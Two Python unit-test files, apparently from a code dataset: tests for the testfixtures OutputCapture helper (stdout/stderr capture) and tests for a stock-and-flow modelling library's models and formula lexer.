testfixtures/tests/test_outputcapture.py
|
abcdenis/testfixtures
| 184 |
89104
|
from __future__ import print_function
import sys
from subprocess import call
from unittest import TestCase
from testfixtures import OutputCapture, compare
from .test_compare import CompareHelper
class TestOutputCapture(CompareHelper, TestCase):
def test_compare_strips(self):
with OutputCapture() as o:
print(' Bar! ')
o.compare('Bar!')
def test_compare_doesnt_strip(self):
with OutputCapture(strip_whitespace=False) as o:
print(' Bar! ')
self.check_raises(
'\tBar!',
compare=o.compare,
message="'\\tBar!' (expected) != ' Bar! \\n' (actual)",
)
def test_stdout_and_stderr(self):
with OutputCapture() as o:
print('hello', file=sys.stdout)
print('out', file=sys.stderr)
print('there', file=sys.stdout)
print('now', file=sys.stderr)
o.compare("hello\nout\nthere\nnow\n")
def test_unicode(self):
with OutputCapture() as o:
print(u'\u65e5', file=sys.stdout)
o.compare(u'\u65e5\n')
def test_separate_capture(self):
with OutputCapture(separate=True) as o:
print('hello', file=sys.stdout)
print('out', file=sys.stderr)
print('there', file=sys.stdout)
print('now', file=sys.stderr)
o.compare(stdout="hello\nthere\n",
stderr="out\nnow\n")
def test_compare_both_at_once(self):
with OutputCapture(separate=True) as o:
print('hello', file=sys.stdout)
print('out', file=sys.stderr)
self.check_raises(
stdout="out\n",
stderr="hello\n",
compare=o.compare,
message=(
'dict not as expected:\n'
'\n'
'values differ:\n'
"'stderr': 'hello' (expected) != 'out' (actual)\n"
"'stdout': 'out' (expected) != 'hello' (actual)\n"
'\n'
"While comparing ['stderr']: 'hello' (expected) != 'out' (actual)\n"
'\n'
"While comparing ['stdout']: 'out' (expected) != 'hello' (actual)"
),
)
def test_original_restore(self):
o_out, o_err = sys.stdout, sys.stderr
with OutputCapture() as o:
self.assertFalse(sys.stdout is o_out)
self.assertFalse(sys.stderr is o_err)
self.assertTrue(sys.stdout is o_out)
self.assertTrue(sys.stderr is o_err)
def test_double_disable(self):
o_out, o_err = sys.stdout, sys.stderr
with OutputCapture() as o:
self.assertFalse(sys.stdout is o_out)
self.assertFalse(sys.stderr is o_err)
o.disable()
self.assertTrue(sys.stdout is o_out)
self.assertTrue(sys.stderr is o_err)
o.disable()
self.assertTrue(sys.stdout is o_out)
self.assertTrue(sys.stderr is o_err)
self.assertTrue(sys.stdout is o_out)
self.assertTrue(sys.stderr is o_err)
def test_double_enable(self):
o_out, o_err = sys.stdout, sys.stderr
with OutputCapture() as o:
o.disable()
self.assertTrue(sys.stdout is o_out)
self.assertTrue(sys.stderr is o_err)
o.enable()
self.assertFalse(sys.stdout is o_out)
self.assertFalse(sys.stderr is o_err)
o.enable()
self.assertFalse(sys.stdout is o_out)
self.assertFalse(sys.stderr is o_err)
self.assertTrue(sys.stdout is o_out)
self.assertTrue(sys.stderr is o_err)
class TestOutputCaptureWithDescriptors(object):
def test_fd(self, capfd):
with capfd.disabled(), OutputCapture(fd=True) as o:
call([sys.executable, '-c', "import sys; sys.stdout.write('out')"])
call([sys.executable, '-c', "import sys; sys.stderr.write('err')"])
compare(o.captured, expected=b'outerr')
o.compare(expected=b'outerr')
def test_fd_separate(self, capfd):
with capfd.disabled(), OutputCapture(fd=True, separate=True) as o:
call([sys.executable, '-c', "import sys; sys.stdout.write('out')"])
call([sys.executable, '-c', "import sys; sys.stderr.write('err')"])
compare(o.captured, expected=b'')
o.compare(stdout=b'out', stderr=b'err')
|
tests/test_systems.py
|
ShaunMerritt/systems
| 203 |
89124
|
<filename>tests/test_systems.py
"Test systems.py"
import unittest
from systems.errors import IllegalSourceStock
import systems.models
import systems.parse
import systems.lexer
class TestModels(unittest.TestCase):
def test_stock_maximum_rate(self):
m = systems.models.Model("Maximum")
a = m.infinite_stock("a")
b_max = 3
b = m.stock("b", systems.models.Formula(0), systems.models.Formula(b_max))
m.flow(a, b, systems.models.Rate(1))
results = m.run()
for i, result in enumerate(results):
if i > b_max:
self.assertEqual(b_max, result['b'])
def test_illegal_conversion_leak_source(self):
"You can't apply a Conversion or Leak to an infinite stock."
m = systems.models.Model("Maximum")
a = m.infinite_stock("a")
b = m.stock("b")
rates = [systems.models.Conversion(0.25), systems.models.Leak(0.25)]
for rate in rates:
with self.assertRaises(IllegalSourceStock):
m.flow(a, b, rate)
def test_infinite_destination_stock(self):
"Should allow infinite stocks as destinations stock for all rates."
rates = [systems.models.Rate(5), systems.models.Conversion(0.25), systems.models.Leak(0.25)]
for rate in rates:
m = systems.models.Model("Maximum")
a = m.stock("a", systems.models.Formula("100"))
b = m.infinite_stock("b")
m.flow(a, b, rate)
m.run(rounds=3)
def test_stock_maximum_conversion(self):
m = systems.models.Model("Maximum")
a_initial = 10
a = m.stock("a", systems.models.Formula(a_initial))
b_max = 3
b = m.stock("b", 0, systems.models.Formula(b_max))
f_rate = 0.5
m.flow(a, b, systems.models.Conversion(f_rate))
results = m.run(rounds=3)
final = results[-1]
self.assertEqual(b_max, final['b'])
# 10 - ((1 / 0.5) * 3) = 4
a_expected = a_initial - ((1 / f_rate) * b_max)
self.assertEqual(a_expected, final['a'])
def test_stock_maximum_leak(self):
m = systems.models.Model("Maximum")
a_initial = 10
a = m.stock("a", systems.models.Formula(a_initial))
b_max = 3
b = m.stock("b", systems.models.Formula(0), systems.models.Formula(b_max))
m.flow(a, b, systems.models.Leak(0.5))
results = m.run(rounds=2)
final = results[-1]
self.assertEqual(b_max, final['b'])
self.assertEqual(a_initial - b_max, final['a'])
def test_stock_minimums(self):
"Stocks should never dip below their minimum value."
m = systems.models.Model("Minimum")
a = m.stock("a", systems.models.Formula(2))
b = m.stock("b", systems.models.Formula(0))
m.flow(a,b, systems.models.Rate(1))
results = m.run(rounds=5)
final = results[-1]
self.assertEqual(0, final['a'])
self.assertEqual(2, final['b'])
def test_stock_negative_flows(self):
"Stocks should never dip below their minimum value."
m = systems.models.Model("Minimum")
c = m.stock("c", systems.models.Formula(2))
a = m.stock("a", systems.models.Formula(5))
b = m.stock("b", systems.models.Formula(0))
m.flow(a,b, systems.models.Rate("c"))
results = m.run(rounds=5)
final = results[-1]
self.assertEqual(0, final['a'])
self.assertEqual(5, final['b'])
def test_partial_fulfillment_rate(self):
m = systems.models.Model("Partial")
a = m.stock("a", systems.models.Formula(5))
b = m.stock("b", systems.models.Formula(0))
systems.parse.parse_flow(m, a, b, "10")
results = m.run(rounds=3)
final = results[-1]
self.assertEqual(0, final['a'])
self.assertEqual(5, final['b'])
def test_formula_rate(self):
m = systems.models.Model("Maximum")
a = m.infinite_stock("a")
b = m.stock("b")
c = m.stock("c")
d = m.stock("d", systems.models.Formula(3))
systems.parse.parse_flow(m, a, b, "d * 2")
systems.parse.parse_flow(m, b, c, "d")
results = m.run(rounds=3)
final = results[-1]
self.assertEqual(12, final['b'])
self.assertEqual(6, final['c'])
class TestFormula(unittest.TestCase):
def test_simple_formulas(self):
cases = [
("0", 0),
("0.5", 0.5),
("100", 100),
("inf", float("+inf")),
]
for case_in, case_out in cases:
lexed = systems.lexer.lex_formula(case_in)
formula = systems.models.Formula(lexed)
self.assertEqual(case_out, formula.compute())
def test_reference_formulas(self):
state = {'a': 10, 'b': 5, 'c': 0}
cases = [
("a", 10),
("b", 5),
("c", 0),
("a * 2", 20),
("b * 3", 15),
("c * 10", 0),
("2 * a", 20),
("3 * b", 15),
("10 * c", 0),
("b * a", 50),
("a * b", 50),
("b * b", 25),
("c * a", 0),
]
for case_in, case_out in cases:
lexed = systems.lexer.lex_formula(case_in)
formula = systems.models.Formula(lexed)
self.assertEqual(case_out, formula.compute(state))
if __name__ == "__main__":
unittest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.